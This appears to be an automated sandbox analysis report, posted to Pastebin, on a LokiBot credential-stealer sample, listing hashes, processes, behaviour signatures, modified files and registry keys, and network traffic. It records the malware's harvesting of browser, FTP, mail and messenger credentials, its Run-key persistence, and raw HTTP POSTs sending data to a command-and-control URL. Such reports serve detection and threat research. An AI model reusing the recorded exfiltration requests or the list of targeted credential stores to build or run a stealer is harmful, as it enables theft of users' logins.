Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- * MalFamily: "Lokibot"
- * MalScore: 10.0
- * File Name: "Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe"
- * File Size: 866197
- * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- * SHA256: "c2a18bb0f191117275ed69b0c35312171ec6bd981d765ca12bd84636aac2c5a2"
- * MD5: "b37757dbd6fa9323b4e5c7105f5b3ffd"
- * SHA1: "3497b0a22db380f04f48e2e588a08e5971813f6f"
- * SHA512: "8b0ba88a89079e20a512dc088b9e55398fcc22686dd3b7c740e3cb533a24485019599a374e6d9573038353be5ca357eb2ee8919f038c1104d161c6ccb922e7fd"
- * CRC32: "36994C9B"
- * SSDEEP: "24576:0k6+c2dm2AwylMll2CSKj9jkqjsW1H7dex+3wwy3:0bHdMll2Aj9jkqwK7dl3e"
- * Process Execution:
- "Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe",
- "dydtgpjcc.exe",
- "dydtgpjcc.exe",
- "services.exe",
- "lsass.exe",
- "taskhost.exe",
- "sc.exe",
- "svchost.exe",
- "svchost.exe",
- "WerFault.exe",
- "wermgr.exe"
- * Executed Commands:
- "C:\\Users\\user\\AppData\\Local\\Temp\\dydtgpjcc.exe ",
- "C:\\Windows\\system32\\lsass.exe",
- "taskhost.exe $(Arg0)",
- "C:\\Windows\\system32\\sc.exe start w32time task_started",
- "C:\\Windows\\system32\\svchost.exe -k LocalService",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "C:\\Windows\\system32\\WerFault.exe -u -p 2328 -s 288",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\""
- * Signatures Detected:
- "Description": "At least one process apparently crashed during execution",
- "Details":
- "Description": "Creates RWX memory",
- "Details":
- "Description": "A process attempted to delay the analysis task.",
- "Details":
- "Process": "dydtgpjcc.exe tried to sleep 1348 seconds, actually delayed analysis time by 0 seconds"
- "Description": "Reads data out of its own binary image",
- "Details":
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00000000, length: 0x00000007"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00000000, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00000007, length: 0x000d378e"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00001ff0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00003fe0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00005fd0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00007fc0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00009fb0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0000bfa0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0000df90, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0000ff80, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00011f70, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00013f60, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00015f50, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00017f40, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00019f30, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0001bf20, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0001df10, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0001ff00, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00021ef0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00023ee0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00025ed0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00027ec0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00029eb0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0002bea0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0002de90, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0002fe80, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00031e70, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00033e60, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00035e50, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00037e40, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00039e30, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0003be20, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0003de10, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x0003fe00, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00041df0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00043de0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00045dd0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00047dc0, length: 0x00002000"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00049800, length: 0x00000031"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x00049819, length: 0x00089f03"
- "self_read": "process: Loki_b37757dbd6fa9323b4e5c7105f5b3ffd.exe, pid: 2236, offset: 0x000d378d, length: 0x00000008"
- "self_read": "process: dydtgpjcc.exe, pid: 1736, offset: 0x00000000, length: 0x0007a000"
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details":
- "post_no_referer": "HTTP traffic contains a POST request with no referer header"
- "http_version_old": "HTTP traffic uses version 1.0"
- "suspicious_request": "http://erxst.info/hero/five/fre.php"
- "Description": "Performs some HTTP requests",
- "Details":
- "url": "http://erxst.info/hero/five/fre.php"
- "Description": "Executed a process and injected code into it, probably while unpacking",
- "Details":
- "Injection": "dydtgpjcc.exe(1736) -> dydtgpjcc.exe(3008)"
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details":
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13521331 times"
- "Description": "Steals private information from local Internet browsers",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
- "Description": "Installs itself for autorun at Windows startup",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\dydtgp"
- "data": "C:\\Users\\user\\AppData\\Local\\dydtgp\\dydtgpnak.vbs"
- "Description": "Creates a hidden or system file",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe"
- "file": "C:\\Users\\user\\AppData\\Roaming\\474604"
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details":
- "Description": "Harvests credentials from local FTP client softwares",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Far Manager\\Profile\\PluginsData\\42E4AEB1-A230-44F4-B33C-F195BB654931.db"
- "file": "C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\FTPGetter\\servers.xml"
- "file": "C:\\Users\\user\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat"
- "key": "HKEY_CURRENT_USER\\Software\\Far\\Plugins\\FTP\\Hosts"
- "key": "HKEY_CURRENT_USER\\Software\\Far2\\Plugins\\FTP\\Hosts"
- "key": "HKEY_CURRENT_USER\\Software\\Ghisler\\Total Commander"
- "key": "HKEY_CURRENT_USER\\Software\\LinasFTP\\Site Manager"
- "Description": "Harvests information related to installed instant messenger clients",
- "Details":
- "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
- "Description": "Harvests information related to installed mail clients",
- "Details":
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\Email"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\13dbb0c8aa05101a9bb000aa002fc45a"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\3517490d76624c419a828607e2a54604"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8f92b60606058348930a96946cf329e1"
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8503020000000000c000000000000046\\Email"
- "Description": "Collects information to fingerprint the system",
- "Details":
- "Description": "Created network traffic indicative of malicious activity",
- "Details":
- "signature": "ET TROJAN LokiBot User-Agent (Charon/Inferno)"
- "signature": "ET TROJAN LokiBot Fake 404 Response"
- "signature": "ET TROJAN LokiBot Checkin"
- "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M2"
- "signature": "ET TROJAN LokiBot Request for C2 Commands Detected M1"
- "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M1"
- "signature": "ET TROJAN LokiBot Application/Credential Data Exfiltration Detected M2"
- * Started Service:
- "VaultSvc",
- "WerSvc",
- "W32Time"
- * Mutexes:
- "DefaultTabtip-MainUI",
- "CicLoadWinStaWinSta0",
- "Local\\MSCTF.CtfMonitorInstMutexDefault1",
- "6EFA73A4746045B65DEE781E",
- "Local\\WERReportingForProcess2328",
- "Global\\\\xe5\\x88\\x90\\xc2\\x94",
- "Global\\\\xed\\x95\\xb0\\xc7\\xa8",
- "WERUI_BEX64-928a3992b7bed7284823981773aca329ad5b54d"
- * Modified Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\__tmp_rar_sfx_access_check_9902578",
- "C:\\Users\\user\\AppData\\Local\\Temp\\dydtgpjcc.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\dydtgp.bmp",
- "C:\\Users\\user\\AppData\\Local\\Temp\\dydtgp.ocx",
- "C:\\Users\\user\\AppData\\Roaming\\dydtgpdydtgp\\dydtgpeyp.exe",
- "C:\\Users\\user\\AppData\\Local\\dydtgp\\dydtgp.bmp",
- "C:\\Users\\user\\AppData\\Local\\dydtgp\\dydtgpdoh.vbs",
- "C:\\Users\\user\\AppData\\Local\\dydtgp\\dydtgpnak.vbs",
- "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
- "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.exe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4cbf3d1d-5feb-4971-b977-59608b4dcace",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA0C7.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA3E4.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA405.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9C2.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\\WERA0C7.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\\WERA3E4.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\\WERA405.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\\WERA9C2.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\\Report.wer",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\\Report.wer.tmp"
- * Deleted Files:
- "C:\\Users\\user\\AppData\\Local\\Temp\\__tmp_rar_sfx_access_check_9902578",
- "C:\\Users\\user\\AppData\\Local\\Temp\\dydtgp.ocx",
- "C:\\Users\\user\\AppData\\Roaming\\474604\\45B65D.lck",
- "C:\\Users\\user\\AppData\\Local\\Temp\\dydtgpjcc.exe",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA0C7.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA0C7.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA3E4.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA3E4.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA405.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA405.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9C2.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9C2.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_928a3992b7bed7284823981773aca329ad5b54d_cab_041c9c70\\Report.wer.tmp"
- * Modified Registry Keys:
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\dydtgp",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
- * Deleted Registry Keys:
- * DNS Communications:
- "type": "A",
- "request": "erxst.info",
- "answers":
- "data": "47.254.215.29",
- "type": "A"
- * Domains:
- "ip": "47.254.215.29",
- "domain": "erxst.info"
- * Network Communication - ICMP:
- * Network Communication - HTTP:
- "count": 2,
- "body": "",
- "uri": "http://erxst.info/hero/five/fre.php",
- "user-agent": "Mozilla/4.08 (Charon; Inferno)",
- "method": "POST",
- "host": "erxst.info",
- "version": "1.0",
- "path": "/hero/five/fre.php",
- "data": "POST /hero/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: erxst.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 299C98FE\r\nContent-Length: 176\r\nConnection: close\r\n\r\n",
- "port": 80
- "count": 22,
- "body": "",
- "uri": "http://erxst.info/hero/five/fre.php",
- "user-agent": "Mozilla/4.08 (Charon; Inferno)",
- "method": "POST",
- "host": "erxst.info",
- "version": "1.0",
- "path": "/hero/five/fre.php",
- "data": "POST /hero/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: erxst.info\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 299C98FE\r\nContent-Length: 149\r\nConnection: close\r\n\r\n",
- "port": 80
- * Network Communication - SMTP:
- * Network Communication - Hosts:
- * Network Communication - IRC:
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
